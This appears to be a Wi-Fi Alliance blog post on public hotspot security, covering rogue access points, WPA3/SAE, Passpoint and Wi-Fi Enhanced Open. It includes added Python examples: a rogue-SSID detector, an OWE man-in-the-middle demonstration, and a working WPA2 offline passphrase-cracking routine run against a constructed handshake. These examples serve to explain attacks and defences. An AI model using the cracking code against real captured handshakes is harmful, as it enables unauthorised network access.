One of the greatest benefits of Wi-Fi® is the virtually ubiquitous access provided by means of public Wi-Fi hotspots. What originally began as a service provided by a handful of niche businesses quickly exploded to become the de facto model for hotels, coffee shops, restaurants, and other businesses. As public Wi-Fi hotspots became mainstream, though, so did the myth that they are inherently insecure and should be avoided.
Public Hotspot Security
Public Wi-Fi hotspots can fall into two categories: Open (or unauthenticated) and secure (or authenticated). Open Wi-Fi networks have no security at all. They do not require a password to join—you can just connect. A secure public hotspot, on the other hand, authenticates users via a password and encrypts wireless traffic.
To be fair, connecting to an open Wi-Fi network in a public place has exposed users to increased risk in a couple of ways. Unencrypted traffic and rogue access points are both issues that are largely specific to open public Wi-Fi hotspots. Businesses that provide open Wi-Fi networks have chosen to make the connection experience as seamless and convenient as possible at the expense of better security.
The first problem is that connections to open Wi-Fi hotspots have traditionally been unencrypted. The value of an open network is that it lets users connect devices without any authentication, but with no encryption between the device and the access point, every frame is sent in the clear over the air. Anyone within radio range can capture that traffic with a passive sniffer without even joining the network, and any device that has joined the same network can also reach yours directly. Sensitive information such as usernames and passwords, or banking and financial details, can therefore be exposed unless the user is accessing websites over HTTPS or using a VPN.
The other issue is simply making sure you are connecting to a legitimate public Wi-Fi hotspot, and not a malicious rogue access point. In many public areas today, it is not uncommon to find multiple open networks to choose from. Your laptop or mobile device will detect and display every network within range, so you might see available networks for a hotel, fast food chain, coffee shop, and others all show up.
Most people are not very discerning, though. The primary objective is to get connected to a Wi-Fi network and be able to access an internet connection. If people are in a hurry, they may not notice they are connecting to a rogue access point. Rogue access points are often given an SSID very similar to a legitimate one, for example "strbucks" or "starbcks" broadcast within range of an actual Starbucks, where users will be looking for a public Wi-Fi hotspot.
In either case, a third party or a cybercriminal may potentially intercept your unencrypted data.
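The look-alike SSID and open-twin patterns described above can be checked mechanically against a scan list. The following is an added example, not code from the original post or from Wi-Fi Alliance; the scan entries and the table of trusted SSIDs with their expected security type are constructed for the example. It flags SSIDs within a small edit distance of a trusted name, the same name advertised with mixed security types, and a trusted name showing up with weaker security than the venue is known to use.

```python
# Added example, not code from the original post or from Wi-Fi Alliance.
# Triage of a Wi-Fi scan list for the rogue-AP patterns described above:
# look-alike SSIDs, one SSID advertised with mixed security types, and a trusted
# SSID showing up with weaker security than expected. The scan list and the
# trusted-SSID table are constructed for the example.
from dataclasses import dataclass


@dataclass(frozen=True)
class ScanEntry:
    ssid: str
    bssid: str
    security: str    # "open", "owe", "wpa2" or "wpa3"
    signal_dbm: int


# Assumption: the venue (or the user's device) keeps a table of legitimate SSIDs
# and the security type each is known to use.
TRUSTED_SSIDS = {"Starbucks": "wpa3", "HotelGuest": "owe"}

# Constructed scan result, not a real capture.
SAMPLE_SCAN = [
    ScanEntry("Starbucks", "00:11:22:33:44:01", "wpa3", -45),
    ScanEntry("strbucks", "00:11:22:33:44:02", "open", -40),     # look-alike
    ScanEntry("Starbcks", "00:11:22:33:44:03", "open", -50),     # look-alike
    ScanEntry("HotelGuest", "00:11:22:33:44:04", "owe", -60),
    ScanEntry("HotelGuest", "00:11:22:33:44:05", "open", -38),   # open twin of a real SSID
    ScanEntry("xfinitywifi", "00:11:22:33:44:06", "open", -70),  # unrelated, not flagged
]


def levenshtein(a: str, b: str) -> int:
    """Edit distance, compared case-insensitively (attackers vary case too)."""
    a, b = a.lower(), b.lower()
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def triage(scan, trusted=TRUSTED_SSIDS, max_distance=2):
    """Return {ssid: [reasons]} for every SSID that shows a rogue-AP indicator."""
    findings = {}

    def flag(ssid, reason):
        findings.setdefault(ssid, []).append(reason)

    by_ssid = {}
    for entry in scan:
        by_ssid.setdefault(entry.ssid, []).append(entry)

    for ssid, entries in by_ssid.items():
        if ssid in trusted:
            # Trusted name, but is it advertised with the security we expect?
            for e in entries:
                if e.security != trusted[ssid]:
                    flag(ssid, f"{e.bssid} advertises {e.security!r}, expected {trusted[ssid]!r}")
        else:
            # Near miss on a trusted name is the "strbucks" trick; distance 0 here
            # means the same name with different case, which is also suspicious.
            for name in trusted:
                d = levenshtein(ssid, name)
                if d <= max_distance:
                    flag(ssid, f"look-alike of trusted SSID {name!r} (edit distance {d})")
        # One SSID with several security types is a classic evil-twin pattern.
        kinds = {e.security for e in entries}
        if len(kinds) > 1:
            flag(ssid, f"same SSID advertised with mixed security {sorted(kinds)}")
    return findings


if __name__ == "__main__":
    for ssid, reasons in triage(SAMPLE_SCAN).items():
        print(ssid, "->", "; ".join(reasons))
```

The edit-distance threshold is deliberately small: at distance 2 it catches dropped or swapped letters without flagging every short unrelated name, but any real deployment should tune it against the venue's own SSID list.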
Debunking the Myth
Simply being aware of the concerns around unencrypted data and rogue access points is a significant step toward protecting against them, and there are simple solutions to mitigate and minimize those risks when connecting to an open Wi-Fi network.
- Businesses or cities deploying public Wi-Fi networks should make sure to deploy Passpoint®, federated programs built on Passpoint® like OpenRoaming, Wi-Fi Enhanced Open, or WPA3 (more on these to come!) for added security precautions
- Use a VPN to encrypt your traffic and prevent it from being intercepted by others connected to the open network
- Connect to HTTPS websites for a secure session
- Disable features that automatically connect with any available open network without user intervention
- Enable a personal firewall to guard against unauthorized access to your device
Public Wi-Fi networks are here to stay, and the myth that public Wi-Fi hotspots are insecure has had very little impact on the availability or use of those networks. Users access public Wi-Fi networks virtually anywhere: hotels, shopping malls, transportation hubs, restaurants and coffee shops, and municipal facilities. A variety of new security technologies now make public Wi-Fi more secure than it was. Wi-Fi Alliance recognized both the value and the potential risk of public Wi-Fi networks, which is why it has introduced technologies like Wi-Fi Enhanced Open™ and Passpoint®, as well as WPA3™. The more widely these technologies are deployed, the more secure public Wi-Fi will become.
WPA3 improves on WPA2 to make Wi-Fi networks more secure than ever before. WPA3-Personal requires at least 128-bit AES encryption and replaces the WPA2 Pre-Shared Key (PSK) handshake with Simultaneous Authentication of Equals (SAE), a password-authenticated key exchange that provides a more secure way of establishing the initial key. Because SAE never uses the password directly as key material, an attacker who captures the handshake cannot test password guesses offline, which is exactly what a captured WPA2 handshake allows. The optional SAE Public Key (SAE-PK) feature mitigates rogue, or "evil twin", access point attacks by adding asymmetric authentication of the access point: a fingerprint of the AP's public key is encoded in the password itself, so a client can verify that the AP it is talking to holds the matching private key.
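To make the offline-guessing weakness concrete, the following added example (not code from the original post or from Wi-Fi Alliance) reproduces the WPA2-Personal key derivation and shows an attacker recovering a weak passphrase from a sniffed handshake without ever contacting the access point again. The SSID, MAC addresses, nonces, EAPOL frame bytes and wordlist are all constructed; the EAPOL frame is a stand-in rather than a faithfully laid out message 2, since only the fact that the MIC is an HMAC over it matters for the attack. This is the property SAE removes: a WPA3 handshake transcript gives an attacker nothing to test guesses against.

```python
# Added example, not code from the original post or from Wi-Fi Alliance.
# It shows why a captured WPA2-Personal 4-way handshake lets an attacker test
# passphrase guesses offline, the weakness that WPA3's SAE handshake removes.
# All MAC addresses, nonces, the EAPOL frame and the wordlist are constructed.
import hashlib
import hmac
from typing import Optional


def wpa2_psk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenation of HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key from the PMK plus values that are all visible in a capture."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key MIC for WPA2/CCMP: first 16 bytes of HMAC-SHA1 over the frame with MIC zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# Constructed "capture" of one handshake: the values an attacker sniffs over the air.
SSID = "CoffeeShop"
AA = bytes.fromhex("001122334455")        # AP MAC (authenticator), constructed
SPA = bytes.fromhex("66778899aabb")       # client MAC (supplicant), constructed
ANONCE = bytes(range(32))                 # constructed nonces, not real ones
SNONCE = bytes(range(32, 64))
# Stand-in for EAPOL-Key message 2 with its MIC field zeroed; only the fact that
# the MIC is an HMAC over these bytes matters for the attack, not the exact layout.
EAPOL_M2 = b"\x02\x03\x00\x75" + b"\x00" * 113


def make_capture(true_passphrase: str) -> dict:
    """Simulate the legitimate client: compute the real MIC the attacker will see."""
    ptk = derive_ptk(wpa2_psk(true_passphrase, SSID), AA, SPA, ANONCE, SNONCE)
    kck = ptk[:16]   # Key Confirmation Key is the first 128 bits of the PTK
    return {"ssid": SSID, "aa": AA, "spa": SPA, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": EAPOL_M2, "mic": eapol_mic(kck, EAPOL_M2)}


def crack(capture: dict, wordlist) -> Optional[str]:
    """Offline dictionary attack: every guess is checked against the captured MIC,
    with no further contact with the access point."""
    for guess in wordlist:
        pmk = wpa2_psk(guess, capture["ssid"])
        ptk = derive_ptk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), capture["mic"]):
            return guess
    return None


if __name__ == "__main__":
    cap = make_capture("correct horse")     # the true passphrase, known only to the network
    print(crack(cap, ["letmein", "wifi1234", "correct horse"]))   # correct horse
```

Each guess costs one PBKDF2 run of 4096 HMAC-SHA1 iterations plus a handful of HMACs, which is cheap enough that real tooling runs such wordlists on GPUs; the SSID-salted PBKDF2 only prevents precomputing one table for every network, not guessing against a specific one.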
Every public network that wants to offer a secure Wi-Fi experience needs to deploy Passpoint® or WPA3 with SAE-PK. Passpoint® is a security option available for public or guest networks that includes WPA3™-Enterprise security, with Protected Management Frames (PMF) and additional Wi-Fi Alliance defined security mechanisms. With Passpoint®, users authenticate their device to the network with credentials provisioned by a service provider, and because that authentication is mutual (the network proves its identity through its authentication server's certificate before the client presents its own credential) a client will not hand its credential to an impostor. The next time they visit the same network, the Passpoint®-enabled client device will automatically connect and establish a secure connection. Wi-Fi CERTIFIED Passpoint® provides a more secure connection and avoids the potential for accidentally connecting to a rogue access point.
Wi-Fi Enhanced Open
Despite the potential risk of data compromise, there are many situations where an open Wi-Fi network is simply more convenient or may be the only feasible option available.
In situations where the public network absolutely must be unauthenticated, there is Wi-Fi Enhanced Open, and operators of open Wi-Fi networks should use it. Wi-Fi Enhanced Open reduces the risk of data exposure or theft while maintaining the convenience of simply connecting to an open network at a public Wi-Fi hotspot. Open Wi-Fi used to mean "unencrypted Wi-Fi", but Wi-Fi Enhanced Open networks now provide unauthenticated data encryption to users. Based on Opportunistic Wireless Encryption (OWE), defined in the Internet Engineering Task Force (IETF) RFC 8110 and the Wi-Fi Alliance Opportunistic Wireless Encryption Specification, Wi-Fi Enhanced Open benefits users by giving each client its own encrypted link to the access point while keeping the ease of use of open networks. The capability is transparent to users, and it benefits network providers because there are no public passphrases to maintain, share, or manage. One caveat that RFC 8110 itself states: because the exchange is unauthenticated, it protects against passive eavesdropping but not against an active attacker who stands up a rogue access point and relays traffic, so HTTPS and VPN use remain good advice on Enhanced Open networks.
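The following added example (not code from the original post or from Wi-Fi Alliance) sketches what OWE does under the hood in plain Python: an ECDH exchange on NIST P-256 (IANA group 19) followed by the HKDF-based PMK derivation of RFC 8110 section 4.4, then shows both the benefit (client and AP agree on a key an eavesdropper cannot compute) and the caveat (a rogue AP in the middle can complete a valid exchange with each side). Assumptions beyond the RFC text: public keys are represented here by their x-coordinate only and the 2-octet group number is encoded little-endian; the on-air Diffie-Hellman Parameter element layout is not modelled. The arithmetic is not constant-time and is for illustration only.

```python
# Added example, not code from the original post or from Wi-Fi Alliance.
# Pure-Python sketch of the OWE (RFC 8110) key exchange behind Wi-Fi Enhanced
# Open: ECDH on NIST P-256 (group 19) and the HKDF-based PMK derivation.
# Assumptions: public keys are represented by their x-coordinate and the 2-octet
# group number is little-endian; the over-the-air element layout is not modelled.
# Not constant-time, so not for production use.
import hashlib
import hmac
import secrets

# NIST P-256 domain parameters
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
GROUP = 19   # IANA group number OWE uses for P-256


def ec_add(p1, p2):
    """Affine point addition; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P


def ec_mul(k, point):
    """Double-and-add scalar multiplication."""
    result, addend = None, point
    while k:
        if k & 1:
            result = ec_add(result, addend)
        addend = ec_add(addend, addend)
        k >>= 1
    return result


def hkdf_extract(salt, ikm):
    return hmac.new(salt, ikm, hashlib.sha256).digest()


def hkdf_expand(prk, info, length):
    out, block, i = b"", b"", 1
    while len(out) < length:
        block = hmac.new(prk, block + info + bytes([i]), hashlib.sha256).digest()
        out += block
        i += 1
    return out[:length]


def keypair():
    priv = secrets.randbelow(N - 1) + 1
    return priv, ec_mul(priv, G)


def encode_pub(pub):
    return pub[0].to_bytes(32, "big")   # x-coordinate only (assumption, see above)


def owe_pmk(my_priv, peer_pub, client_pub_bytes, ap_pub_bytes):
    """RFC 8110 4.4: prk = HKDF-extract(C | A | group, z); PMK = HKDF-expand(prk, "OWE Key Generation", n)."""
    z = ec_mul(my_priv, peer_pub)[0].to_bytes(32, "big")   # shared secret: x of the ECDH point
    salt = client_pub_bytes + ap_pub_bytes + GROUP.to_bytes(2, "little")  # endianness assumed
    pmk = hkdf_expand(hkdf_extract(salt, z), b"OWE Key Generation", 32)
    pmkid = hashlib.sha256(client_pub_bytes + ap_pub_bytes).digest()[:16]
    return pmk, pmkid


def demo_exchange():
    """Client and AP end up with the same PMK; an eavesdropper sees only C and A."""
    c_priv, c_pub = keypair()
    a_priv, a_pub = keypair()
    C, A_ = encode_pub(c_pub), encode_pub(a_pub)   # what actually goes over the air
    return owe_pmk(c_priv, a_pub, C, A_) == owe_pmk(a_priv, c_pub, C, A_)


def demo_active_attacker():
    """OWE is unauthenticated: a rogue AP can run one exchange with the client and
    another with the real AP, holding a valid PMK on each side (the caveat in the text)."""
    c_priv, c_pub = keypair()
    a_priv, a_pub = keypair()
    m_priv, m_pub = keypair()   # the rogue AP in the middle
    C, M, A_ = encode_pub(c_pub), encode_pub(m_pub), encode_pub(a_pub)
    pmk_client, _ = owe_pmk(c_priv, m_pub, C, M)     # client believes M is the AP
    pmk_rogue_c, _ = owe_pmk(m_priv, c_pub, C, M)
    pmk_rogue_a, _ = owe_pmk(m_priv, a_pub, M, A_)   # rogue poses as a client to the AP
    pmk_ap, _ = owe_pmk(a_priv, m_pub, M, A_)
    return pmk_client == pmk_rogue_c and pmk_ap == pmk_rogue_a and pmk_client != pmk_ap
```

The contrast between the two demo functions is the whole security story of Enhanced Open: nothing in the exchange ties either public key to an identity, so encryption is always established but only ever with whoever answered the association request.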
Use Public Wi-Fi with Confidence
The pervasive myth about the insecurity of public Wi-Fi hotspots is exaggerated, but there is a grain of truth to it. It is important to be aware of the potential security concerns and take appropriate steps, like making sure technologies such as Passpoint® are enabled on your device, to ensure your data is not intercepted or compromised while connecting to public Wi-Fi networks. Wi-Fi Alliance continues to raise the bar for public Wi-Fi security.